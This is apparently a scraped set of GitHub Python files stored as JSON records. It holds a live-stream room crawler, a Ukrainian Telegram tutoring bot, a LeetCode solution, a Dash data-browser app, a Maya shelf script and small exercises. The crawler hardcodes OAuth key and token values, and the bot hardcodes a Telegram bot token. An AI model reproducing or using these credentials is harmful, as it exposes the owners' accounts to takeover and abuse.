'oauth_signature_method=HMAC-SHA1&oauth_consumer_key=d690ae490693370caa8b37dafb635a79&oauth_version=1.0&oauth_timestamp=1501830578&oauth_nonce=e00362bf9a361bd66f7d5966edc935ee&oauth_token=3026031_95fcbd992e22c6c4307e4e2e3cf1982b&oauth_signature=mKVtnxdJtY8nztZM%2BgsD1IuK3tA%3D'\n self.headers = {\n \"Host\": \"www.17biyi.cn\",\n \"User-Agent\": \"okhttp/2.5.0\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n def get_list(self) -> list:\n \"\"\"没有分页\"\"\"\n resp = requests.post(url=self.url,\n data=self.data,\n headers=self.headers)\n ret = []\n rooms = resp.json()['result']\n for room in rooms:\n tmp = dict()\n tmp['pid'] = platform['id']\n tmp['name'] = room[\"nickname\"]\n tmp['rid'] = room['gid']\n tmp['title'] = room['levelTitle']\n tmp['avatar'] = room['face_url']\n tmp['url'] = room['streamAddr']\n\n ret.append(tmp)\n\n return ret\n\n def get_address(self) -> str:\n pass\n\n def xx_crawl(self):\n data = self.get_list()\n print(data)\n\n\ndef main():\n router = Router()\n ls = router.get_list()\n print(ls)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"blademist/py-live","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"17326817624","text":"import telebot\nimport datetime\n\n# Словник з відповідностями англійських назв днів тижня до українських\ndays_of_week = {\n 'Monday': 'Понеділок',\n 'Tuesday': 'Вівторок',\n 'Wednesday': 'Середа',\n 'Thursday': 'Четвер',\n 'Friday': \"П'ятниця\",\n 'Saturday': 'Субота',\n 'Sunday': 'Неділя'\n}\n\n\n#@P33botbot\nbot = telebot.TeleBot('6098126284:AAGkdJt9BGoIkUbBvvp6Mqysuj0ZAmzxd_A')\n\n@bot.message_handler(commands=['start'])\ndef start (message):\n bot.send_message(message.chat.id, f'Привіт {message.from_user.first_name} {message.from_user.last_name}, ось'\n f' довідник по Python.\\n'\n 'Список команд:'\n '\\n Перша ДЗ по боту:' \n '\\n/while'\n '\\n/def'\n '\\n/try'\n '\\n/break'\n '\\n/await'\n '\\n/for'\n '\\n/import'\n '\\n/if'\n '\\n/and'\n '\\n/del'\n '\\n/return'\n '\\nДруга дз по боту, відправка Файлів на текст і дія з часом:'\n '\\n/list'\n '\\n/time'\n '\\nОсобисті команди:'\n '\\n#/calculator', parse_mode='html')\n\n\n@bot.message_handler(commands=['while'])\ndef while_1(message):\n text = 'while Цикл Python використовує ключове слово while і працює як while цикл в інших мовах програмування. ' \\\n 'Поки умова, яка слідує за while ключовим словом, відповідає дійсності, блок, наступний за while оператором,' \\\n ' продовжуватиме виконуватися знову і знову.'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['def'])\ndef def_1(message):\n text = 'Ключове слово Python def використовується для визначення функції або методу класу. Це еквівалентно function' \\\n ' JavaScript і PHP. Основний синтаксис для визначення функції defвиглядає так: \\ndef ():' \\\n '\\n\\t\\t\\t\\t\\t'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['try'])\ndef try_1(message):\n text = 'Будь-який блок обробки винятків починається з ключового слова Python try. Це те ж саме в більшості інших ' \\\n 'мов програмування, які мають обробку винятків. Код у try блоці – це код, який може викликати виключення.' 
\\\n ' Кілька інших ключових слів Python пов’язані з try і використовуються для визначення того, що слід робити,' \\\n ' якщо виникають різні винятки або в різних ситуаціях.'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['break'])\ndef break_1(message):\n text = 'Ключове break слово. Якщо вам потрібно вийти з циклу раніше, ви можете використати break ключове слово. ' \\\n 'Це ключове слово працюватиме в обох циклах for і while'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['await'])\ndef await_1(message):\n text = 'Ключове слово Python await використовується в асинхронних функціях, щоб визначити точку у функції, де' \\\n ' керування повертається циклу подій для виконання інших функцій. Ви можете використовувати його, ' \\\n 'розмістивши await ключове слово перед викликом будь-якої async функції'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['for'])\ndef for_1(message):\n text = 'Найбільш поширеним циклом у Python є for цикл. Він створений шляхом поєднання ключових слів Python for і' \\\n ' in пояснений раніше. Основний синтаксис циклу for такий: \\nfor in :' \\\n ' \\n\\t\\t\\t\\t\\t'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['import'])\ndef import_1(message):\n text = 'Ключове слово Python import використовується для імпорту або включення модуля для використання у вашій' \\\n ' програмі Python. Основний синтаксис використання виглядає так: \\nimport '\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['if'])\ndef if_1(message):\n text = 'Ключове if слово використовується для початку умовного оператора . Інструкція if дозволяє вам написати блок' \\\n ' коду, який буде виконано, лише якщо вираз після if є правдивим. Синтаксис оператора if починається з' \\\n ' ключового слова if на початку рядка, за яким слідує дійсний вираз, значення якого буде оцінено на його' \\\n ' правдивість'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['and'])\ndef and_1(message):\n text = 'Ключове слово Python and використовується, щоб визначити, чи лівий, і правий операнди правдиві чи хибні. ' \\\n 'Якщо обидва операнди правдиві, то результат буде правдивим. Якщо один хибний, то результат буде хибним'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['del'])\ndef del_1(message):\n text = 'del використовується в Python для скасування змінної або імені. Ви можете використовувати його для імен ' \\\n 'змінних, але більш поширеним є видалення індексів зі списку або словника . Щоб скасувати змінну, ' \\\n 'використовуйте, del а потім змінну, яку потрібно скасувати'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['return'])\ndef return_1(message):\n text = 'Ключове слово Python return дійсне лише як частина функції, визначеної за допомогою def. 
Коли Python' \\\n ' зустрічає це ключове слово, він вийде з функції в цей момент і поверне результати того, що йде після' \\\n ' ключового return слова'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['list'])\ndef list(message):\n bot.send_message(message.chat.id, 'Список текстових команд по html файлам новини Python:' \\\n '\\napril_2022' \\\n '\\napril_2023' \\\n '\\naugust_2022' \\\n '\\nfebruary_2022' \\\n '\\nfebruary_2023' \\\n '\\njanuary_2022' \\\n '\\njanuary_2023' \\\n '\\njuly_2022' \\\n '\\njune_2022' \\\n '\\nmarch_2022' \\\n '\\nmarch_2023' \\\n '\\nmay_2022' \\\n '\\nnovember_2022' \\\n '\\noctober_2022' \\\n '\\nseptember_2022', parse_mode='html')\n\n@bot.message_handler(commands=['time'])\ndef time(message):\n bot.send_message(message.chat.id, 'Список текстових команд часу та дати:' \\\n '\\nдата - Отримати поточну дату' \\\n '\\nчас - Дізнатися поточний час' \\\n '\\nдень тижня - Дізнатися день тижня' \\\n '\\nзалишилось - Розрахувати кількість днів до вказаної дати' \\\n '\\nрозрахувати дату - Розрахувати дату через певну кількість днів' \\\n '\\nгодино дні - Перевести години в дні', parse_mode='html')\n\n@bot.message_handler(content_types=['text'])\ndef get_user_text(message):\n if message.text == 'hello':\n bot.send_message(message.chat.id, 'і тобі привіт')\n elif message.text == 'python':\n bot.send_message(message.chat.id, 'о ти вивчаєш пайтон')\n elif message.text == 'python logo':\n photo = open('python.jpg','rb')\n bot.send_photo(message.chat.id, photo)\n elif message.text == 'cod':\n doc = open('1.docx', 'rb')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'april_2022':\n doc = open('april_2022.html', 'r', encoding='utf-8')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'april_2023':\n doc = open('april_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'august_2022':\n doc = open('august_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'february_2022':\n doc = open('february_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'february_2023':\n doc = open('february_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'january_2022':\n doc = open('january_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'january_2023':\n doc = open('january_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'july_2022':\n doc = open('july_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'june_2022':\n doc = open('june_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'march_2022':\n doc = open('march_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'march_2023':\n doc = open('march_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'may_2022':\n doc = open('may_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'november_2022':\n doc = open('november_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'october_2022':\n doc = open('october_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'september_2022':\n doc = open('september_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n\n elif message.text.lower() == 'дата':\n date_now = datetime.date.today()\n 
bot.send_message(message.chat.id, date_now)\n\n elif message.text.lower() == 'день тижня':\n date_now = datetime.date.today().strftime(\"%A\")\n ukr_day = days_of_week.get(date_now)\n bot.send_message(message.chat.id, ukr_day)\n\n elif message.text.lower() == 'час':\n time_now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n bot.send_message(message.chat.id, time_now)\n\n elif message.text.lower() == 'залишилось':\n bot.send_message(message.chat.id, 'Введіть дату у форматі РРРР-ММ-ДД:')\n bot.register_next_step_handler(message, get_user_date)\n\n elif message.text.lower() == 'розрахувати дату':\n bot.send_message(message.chat.id, 'Введіть кількість днів:')\n bot.register_next_step_handler(message, calculate_date)\n\n elif message.text.lower() == 'годино дні':\n bot.send_message(message.chat.id, 'Введіть кількість годин:')\n bot.register_next_step_handler(message, calculate_date1)\n\n else:\n bot.send_message(message.chat.id, 'Я тебе не розумію')\n\ndef get_user_date(message):\n try:\n user_date = datetime.datetime.strptime(message.text, \"%Y-%m-%d\").date()\n today = datetime.date.today()\n diff = user_date - today\n bot.send_message(message.chat.id, f\"До {user_date} залишилось: {diff.days} днів\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id,\n 'Некоректний формат дати. Введіть ще раз \"залишилось\" і дату у форматі РРРР-ММ-ДД.')\n\ndef calculate_date(message):\n try:\n days = int(message.text)\n today = datetime.date.today()\n calculated_date = today + datetime.timedelta(days=days)\n bot.send_message(message.chat.id, f\"Дата через {days} днів: {calculated_date}\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id, 'Некоректне значення кількості днів. Введіть ціле число.')\n\ndef calculate_date1(message):\n try:\n days = int(message.text)\n calculated_date1 = round(days/24, 2)\n bot.send_message(message.chat.id, f\"{days} годин це: {calculated_date1} днів\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id, 'Некоректне значення кількості днів. 
Введіть ціле число.')\n\n@bot.message_handler(content_types=['photo'])\ndef get_user_photo(message):\n bot.send_message(message.chat.id, 'Класна фото')\n\nbot.polling(none_stop=True)\n\n","repo_name":"imukha/itStepP33","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15272,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27896368233","text":"# aka symmetry axis / symmetry line\n\n# fyi:\n# https://leetcode.com/problems/line-reflection/solutions/202760/bad-problem-description-come-and-read-what-it-really-means/\n# https://leetcode.com/problems/line-reflection/solutions/3137429/python-o-n-solution-using-dict/\nclass Solution:\n def isReflected(self, points: List[List[int]]) -> bool:\n if not points:\n return True\n\n # count all points\n points_count = collections.defaultdict(int)\n # leftmost/rightmost points\n min_x, max_x = float('inf'), -float('inf')\n for x, y in points:\n # increment it if you'd like to count same coord points as different onesc\n points_count[(x, y)] = 1\n min_x = min(min_x, x)\n max_x = max(max_x, x)\n\n # symmetry line\n mid_x = (min_x + max_x) / 2\n\n # check if points have their mirror points\n for x, y in points:\n # mid - x + mid = 2*mid - x\n mirror_x = 2 * mid_x - x\n mirror_count = points_count.get((mirror_x, y))\n\n if mirror_count is not None:\n if mirror_count > 1:\n points_count[(mirror_x, y)] -= 1\n else:\n del points_count[mirror_x, y]\n\n # if hashmap is empty, all points have proper mirror points\n return not points_count","repo_name":"chlos/exercises_in_futility","sub_path":"leetcode/line_reflection.py","file_name":"line_reflection.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30380924859","text":"# Try It Yourself Exercise - Pg.146\n# 8-9 Messages\n########################################################################################################################\n# Make a list containing a series of short text messages\n# Pass the list to a function called show_messages(), which prints each text message\n########################################################################################################################\n\ndef show_messages(text_message):\n \"\"\"Shows all text messages within a list.\"\"\"\n for message in text_message:\n print(message)\n\nmessages = [\"Hi, how are you?\", \"Sorry, can't talk now :(\", \"ttyl\", \"ttfn\", \"lol\"]\n\nshow_messages(messages)","repo_name":"BrockAllen-au/Learning_Python","sub_path":"Chapter 8/messages_8-9.py","file_name":"messages_8-9.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4726185217","text":"\"\"\"Controls and vizualisation for 'mini-kep' dataset using Dash/Plotly\n\nScenario:\n\n1. when page is loaded there is a frequency and two indicators selected,\n a plot is drawn\n\n2. select frequency in radio buttons\n -> frequency selection affects list of indicators in drop-down menu 1 and 2\n\n3. select indicator 1 by name in drop-down menu\n -> choosing name affects plot and download footer\n\n4. select indicator 2 by name in drop-down menu\n -> choosing name affects plot and download footer\n\n5. Slider controls source date range and axis range. When changing\n source the Y axis changes as well.\n\nNOT IMPLMENTED:\n\n1. Group selector added before each variable name selector.\n\n2. 
Position right pane\n\n3. Show latest value \n\n4. Show var and unit description\n\n5. Default vars for frequency\n\n6. More html header\n\"\"\"\n\n\nimport os\nimport flask\nfrom datetime import datetime\nfrom random import randint\n\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport minikep\n\n# Setup from \n# \"... the template is configured to execute 'server' on 'app.py'... \"\nserver = flask.Flask(__name__)\nserver.secret_key = os.environ.get('secret_key', str(randint(0, 1000000)))\napp = dash.Dash(__name__, server=server)\n\n# app properties\napp.css.append_css({\"external_url\": \"https://codepen.io/anon/pen/LONErz.css\"})\napp.title = 'MiniKEP data browser'\n\n\nNAMES = {freq: minikep.names(freq) for freq in 'aqmd'}\n\n\nclass WidgetItems:\n @classmethod\n def names(cls, freq):\n \"\"\"Varibale names by frequency.\"\"\"\n return [{'label': name, 'value': name} for name in NAMES.get(freq)]\n\n @classmethod\n def frequencies(cls):\n return [\n {'label': 'Annual', 'value': 'a'},\n {'label': 'Quarterly', 'value': 'q'},\n {'label': 'Monthly', 'value': 'm'},\n {'label': 'Daily', 'value': 'd'}\n ]\n\n\nclass DataSeries:\n def __init__(self, freq, name):\n self.freq = freq\n self.name = name\n self.data = minikep.datapoints(freq, name)\n\n @staticmethod\n def get_year(datapoint):\n return datetime.strptime(datapoint['date'], \"%Y-%m-%d\").year\n\n def filter(self, start, end):\n def is_in_range(datapoint):\n year = self.get_year(datapoint)\n return year >= start and year <= end\n\n self.data = [d for d in self.data if is_in_range(d)]\n return self\n\n def convert_annual_dates_to_int(self):\n \"\"\"In annual time series plot 1999-12-31 will be plotted around 2000,\n which is misleading, must shift x value to 1999.\"\"\"\n if self.freq == 'a':\n for d in self.data:\n d['date'] = self.get_year(d)\n\n @property\n def dict(self):\n self.convert_annual_dates_to_int()\n return dict(x=[d['date'] for d in self.data],\n y=[d['value'] for d in self.data],\n name=self.name)\n\n\nMIN_YEAR = 1999\nMAX_YEAR = datetime.today().year\n\n\ndef marks(min_year=MIN_YEAR, max_year=MAX_YEAR):\n marks = {i: \"\" for i in range(min_year, max_year)}\n for year in [min_year, 2005, 2010, 2015, max_year]:\n marks[year] = str(year)\n return marks\n\n\n\nHEADER = '''\n# Explore mini-kep dataset\n'''\n\n# Use controls below to select time series frequency and variable names.\n\nFOOTER = '''Links: \n [project home](https://github.com/mini-kep/intro),\n [app code](https://github.com/mini-kep/frontend-dash), \n [dev notes](https://github.com/mini-kep/intro/blob/master/DEV.md), \n [Trello issues](https://trello.com/b/ioHBMwH7/minikep)\n'''\n\nSTART_VALUES = dict(freq='q', name1='GDP_yoy', name2='CPI_rog')\n\nleft_window = html.Div([\n dcc.Markdown(HEADER),\n dcc.RadioItems(\n id='frequency',\n options=WidgetItems.frequencies(),\n value=START_VALUES['freq']\n ),\n dcc.Dropdown(id='name1', value=START_VALUES['name1']),\n dcc.Dropdown(id='name2', value=START_VALUES['name2']),\n html.Div([\n dcc.Graph(id='time-series-graph'),\n dcc.RangeSlider(\n id='view-years',\n count=1,\n step=1,\n min=MIN_YEAR, max=MAX_YEAR,\n marks=marks(),\n value=[MIN_YEAR, MAX_YEAR]\n )\n ], style={'marginBottom': '50'}\n ),\n html.Div(id='download-links'),\n], style={'width': '500'}\n)\n\nright_window = html.Div([\n html.Div(id='var1-info', style={'marginBottom': 25}),\n html.Div(id='var2-info', style={'marginBottom': 25}),\n], style={'marginRight': 75})\n\n\ntr1 
= html.Tr([\n html.Td(left_window, style={'verticalAlign': 'top'}),\n html.Td(right_window, style={'verticalAlign': 'top'}),\n ])\n\n# TODO: two extra hr-like lines appear \n\napp.layout = html.Div([\n \n html.Table([tr1]),\n \n html.Div(dcc.Markdown(FOOTER), style={'marginTop': 15}) \n \n ], style={'marginTop': 25, 'marginLeft': 50})\n \n \n# callbacks \n \n# Variable BRENT\n# Frequency: d\n# Start: 1987-05-20\n# End: 2017-10-30\n# Latest value: 60.65\n# Download: \n# Short link: \n\n\ndef make_row(x):\n return html.Tr([html.Td(x[0]), html.Td(x[1])])\n\ndef make_html_table(table_elements):\n return html.Table([make_row(x) for x in table_elements])\n\n# FIXME: freq repeated in two tables\n\ndef short_link(freq, name):\n cu = minikep.CustomAPI(freq, name)\n return html.A(cu.endpoint, href=cu.url)\n\ndef varinfo(freq, name):\n vi = minikep.VarInfo(freq, name)\n table_elements = [\n (html.B('Variable'), html.B(name)),\n ('Description', 'reserved'),\n ('Frequency', freq),\n ('Start', vi.start_date),\n ('Latest date', vi.latest_date),\n # FIMXE in API: shows 'reserved'\n ('Latest value', vi.latest_value),\n #('Download', download_link(freq, name)),\n ('Short link', short_link(freq, name))\n ]\n return make_html_table(table_elements)\n\n\n@app.callback(output=Output('var1-info', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n ])\ndef update_varinfo1(freq, name):\n return varinfo(freq, name)\n\n\n@app.callback(output=Output('var2-info', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name2', component_property='value')\n ])\ndef update_varinfo2(freq, name):\n return varinfo(freq, name)\n\n\n@app.callback(output=Output('name1', component_property='options'),\n inputs=[Input('frequency', component_property='value')])\ndef update_names1(freq):\n return WidgetItems.names(freq)\n\n\n@app.callback(output=Output('name2', component_property='options'),\n inputs=[Input('frequency', component_property='value')])\ndef update_names2(freq):\n return WidgetItems.names(freq)\n\n\ndef xrange(freq, years):\n \"\"\"Updating x axis based on years selection in range slider.\"\"\"\n if freq == 'a':\n start = years[0] - 2\n end = years[1] + 3\n return dict(range=[\"{start}\", \"{end}\"])\n else:\n start = years[0] - 2\n end = years[1] + 2\n return dict(range=[f\"{start}-12-31\", f\"{end}-12-31\"])\n\n\ndef annotation_item(data_dict):\n x, y = get_last(data_dict)\n return dict(xref='x', yref='y',\n x=x, y=y,\n font=dict(color='black'),\n xanchor='left',\n yanchor='middle',\n text=f' {y}',\n showarrow=False)\n\n\ndef get_last(data_dict):\n return data_dict['x'][-1], data_dict['y'][-1]\n\n\n@app.callback(output=Output('time-series-graph', 'figure'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n Input('name2', component_property='value'),\n Input('view-years', component_property='value'),\n ])\ndef update_graph_parameters(freq, name1, name2, years):\n # data\n ts1 = DataSeries(freq, name1).filter(*years).dict\n anno = [annotation_item(ts1)]\n data_list = [ts1]\n if name2:\n ts2 = DataSeries(freq, name2).filter(*years).dict\n data_list.append(ts2)\n anno.append(annotation_item(ts2))\n # layout\n layout_dict = dict(margin={'l': 40, 'r': 0, 't': 20, 'b': 30},\n legend=dict(orientation=\"h\"),\n showlegend=True)\n layout_dict['xaxis'] = xrange(freq, years)\n layout_dict['annotations'] = anno\n return dict(layout=layout_dict, data=data_list)\n\n\ndef 
download_data_html(freq, names, years):\n link_text = 'Download data in CSV format'\n # FIXME: use years in link\n url = minikep.get_frame_url(freq, names)\n return html.A(link_text, href=url)\n\n\n@app.callback(output=Output('download-links', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n Input('name2', component_property='value'),\n Input('view-years', component_property='value'),\n ])\ndef update_link_parameters(freq, name1, name2, years):\n link1 = None\n names = [name for name in (name1, name2) if name] \n if freq and names:\n link1 = download_data_html(freq, names, years)\n return [link1]\n\n\n# app.layout controls HTML layout of dcc components on page:\n# - header and footer markdown blocks\n# - radio items\n# - 2 dropdown menus\n# - graph with time series\n# - slider for timerange\n# - links to download data\n\n\nif __name__ == '__main__':\n port = os.environ.get('DASH_PORT', 8000)\n app.server.run(debug=True, threaded=True, port=int(port))\n","repo_name":"mini-kep/frontend-dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"27881524813","text":"import os\nfrom maya import mel, cmds\nfrom functools import partial\nfrom collections import OrderedDict\n\nbuttons = OrderedDict(\n {\n \"FocalOffsetNode\": {\n \"command\": (\"import FocalOffset\\nFocalOffset.main()\"),\n \"sourceType\": \"python\",\n \"style\": \"iconOnly\",\n \"image\": \"maya_focaloffset_icon.png\",\n \"annotation\": \"Focal Offset Node\",\n \"enableCommandRepeat\": False,\n \"flat\": True,\n \"width\": 32,\n \"height\": 32,\n \"enableBackground\": False,\n },\n }\n)\n\n\ndef create_shelf():\n \"\"\"\n Create the OBB shelf\n\n Raises:\n None\n\n Returns:\n None\n \"\"\"\n\n tab_layout = mel.eval(\"$pytmp=$gShelfTopLevel\")\n shelf_exists = cmds.shelfLayout(\"FocalOffset\", exists=True)\n\n if shelf_exists:\n cmds.deleteUI(\"FocalOffset\", layout=True)\n\n shelf = cmds.shelfLayout(\"FocalOffset\", parent=tab_layout)\n\n for button, kwargs in buttons.items():\n cmds.shelfButton(label=button, parent=shelf, **kwargs)\n\n # Fix object 0 error.\n shelves = cmds.shelfTabLayout(tab_layout, query=True, tabLabelIndex=True)\n\n for index, shelf in enumerate(shelves):\n cmds.optionVar(stringValue=(\"shelfName%d\" % (index + 1), str(shelf)))\n\n\ncreate_shelf()\n","repo_name":"chrisdevito/FocalOffsetNode","sub_path":"scripts/FocalOffset/shelf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13773303330","text":"from feasible_sqp import *\nimport numpy as nmp\n\nINSTALL_DEPS = 0\nUSE_MATLAB_HSL = 0\n\nif INSTALL_DEPS:\n if USE_MATLAB_HSL: \n install_dependencies(matlab_root_path='/usr/local/MATLAB/R2017b')\n else:\n install_dependencies(\n blas_lib_path='/usr/lib/x86_64-linux-gnu/blas/libblas.so', \\\n lapack_lib_path='/usr/lib/x86_64-linux-gnu/lapack/liblapack.so', \\\n hsl_lib_path='/usr/local/lib/libhsl.so')\n\n# number of primal variables\nnv = 2\n# create solver\nsolver = feasible_sqp(nv, np=1)\n# get primal variables\ny = solver.y\np = solver.p\n\n# define cost\nf = 1.0/2.0*ca.mtimes((y-p).T,y-p)\n# define constraints\ng = ca.vertcat(y[0] + 1.0*ca.sin(y[1]) + 0.5)\n# define bounds\nlby = -0.4*nmp.ones((nv,1))\nuby = 0.7*nmp.ones((nv,1))\n# define nonlinear 
constraints\nlbg = -0.000*nmp.ones((1,1))\nubg = 0.000*nmp.ones((1,1))\n# define parameters\np0 = 10.0*nmp.ones((1,1))\n# generate solver\nsolver.generate_solver(f,f,g, lby = lby, uby = uby, lbg=lbg, ubg=ubg, p0 = p0)\n# solver.generate_solver(f,f,g, lby = lby, uby = uby)\n\n# solve NLP\nsolver.solve()\ny_bar = solver.get_primal_sol()\nprint('optimal primal solution: ', y_bar)\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\nprint('')\n\n# set params\nsolver.set_param(-10.0*nmp.ones((1,1)))\n# set initial guess\nsolver.set_primal_guess(y_bar)\nsolver.set_dual_guess(lam_bar)\n\n# re-solve NLP\nsolver.solve()\ny_bar = solver.get_primal_sol()\nprint('optimal primal solution: ', y_bar)\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\nprint('')\n\n# set params\nsolver.set_param(10.0*nmp.ones((1,1)))\n# set initial guess\nsolver.set_primal_guess(y_bar)\nsolver.set_dual_guess(lam_bar)\nsolver.solve()\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\n\nstats = solver.get_stats()\n","repo_name":"zanellia/feasible_sqp","sub_path":"examples/main_solve.py","file_name":"main_solve.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"20"} +{"seq_id":"2694799346","text":"class Solution:\n def Euclidean(self, points: List[int]):\n x, y = points\n return (x**2 + y**2)**0.5\n \n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n result = []\n sortedLists = []\n \n for point in points:\n heapq.heappush(sortedLists, (self.Euclidean(point), point[0], point[1]))\n \n # print(sortedLists)\n \n# minNum = float('inf') \n# while sortedLists:\n# if minNum < sortedLists[0][0]:\n# break\n \n# tmp = heapq.heappop(sortedLists)\n# result.append(tmp[1])\n# minNum = tmp[0]\n \n for _ in range(k):\n _, x, y = heapq.heappop(sortedLists)\n result.append([x,y])\n \n return result","repo_name":"donghyeon95/algorithms","sub_path":"973-k-closest-points-to-origin/973-k-closest-points-to-origin.py","file_name":"973-k-closest-points-to-origin.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27528352020","text":"from HashTable import HashTable\n\ndef read_txt_to_matrix(path : str) -> list:\n \"\"\"\n Função de leitura de um arquivo-texto, que salva\n sua informação em uma matriz (lista de listas).\n \"\"\"\n \n return_matrix = list() # O(1)\n with open(path, 'r') as f:\n for line in f.readlines(): # O(l)\n return_matrix.append(list(map(int, line.split(' ')))) # O(c), onde c é o número de colunas\n return return_matrix # O(1)\n # O(1) + O(l)*O(c) + O(1) => O(l)*O(c) => O(n)\n\n\ndef print_matrix(matrix : list) -> None:\n \"\"\"\n Função para imprimir uma matriz na tela\n \"\"\"\n line_len = len(matrix[0]) # O(1) ou O(n) (depende da implementação da função len() e da classe list do Python)\n for line in matrix: # O(l)\n print('[', end='') # O(1)\n\n for idx, num in enumerate(line): # O(c)\n if idx == line_len - 1: # O(1)\n print(f'{num}', end='') # O(1)\n else: # O(1)\n print(f'{num}, ', end='') # O(1)\n \n print(']') # O(1)\n \n # O(n) + O(l)*O(c)*O(1) + O(1) => O(n)\n\n\ndef change_duplicate_on_matrix(matrix : list, hash_table_size : int = 53) -> None:\n \"\"\"\n Função para substituir itens duplicados por 0\n \"\"\"\n original_idxs = dict()\n ht = HashTable(hash_table_size) # O(1) em relação ao tamanho da lista\n # Nota: utilizei um número 
primo, pois pela minha função de disperção, esses números são preferíveis\n # O tamanho do vetor base pode variar para melhor acomodar o custo do algoritmo\n\n for idx_l, line in enumerate(matrix): # O(l)\n for idx_c, element in enumerate(line): # O(c)\n _, test = ht.has(element)\n if test >= 0: # O(1) no caso médio\n matrix[idx_l][idx_c] = 0\n if matrix[original_idxs[element][0]][original_idxs[element][1]] != 0:\n matrix[original_idxs[element][0]][original_idxs[element][1]] = 0\n ht.add(element) # O(1) no caso médio\n original_idxs[element] = (idx_l, idx_c)\n # O(l)*O(c)*O(1) => O(n) no caso médio\n\n","repo_name":"rabdiego/processo_seletivo_ceos","sub_path":"fase_1/matrizes.py","file_name":"matrizes.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"1460939388","text":"from notebook.base.handlers import IPythonHandler\n\nclass SwanHandler(IPythonHandler):\n\n def get(self):\n \"This method renders the Jobs Page in SWAN Tree view.\"\n\n self.write(self.render_template('gangapage.html',\n\t\t\t\t\tpage_title='Jobs',\n\t\t\t\t\tganga_page='True',\n\t\t\t\t\tterminals_available=self.settings['terminals_available'],\n ))\n","repo_name":"apsknight/gangaextension","sub_path":"extension/gangaextension/serverextension/swanhandler.py","file_name":"swanhandler.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"26715444866","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 거리를 재면서 bfs\ndef bfs(r, c):\n level = 1 # 거리를 level로 표현\n visited = [[0]*N for _ in range(N)]\n\n # delta 상 우 하 좌\n dr = [-1, 0, 1, 0]\n dc = [0, 1, 0, -1]\n\n \n # queue에 시작점 넣어주기\n queue = []\n queue.append([r,c])\n visited[r][c] = 1\n\n\n while queue:\n size = len(queue) \n for _ in range(size): # 현재 level의 길이 만큼만 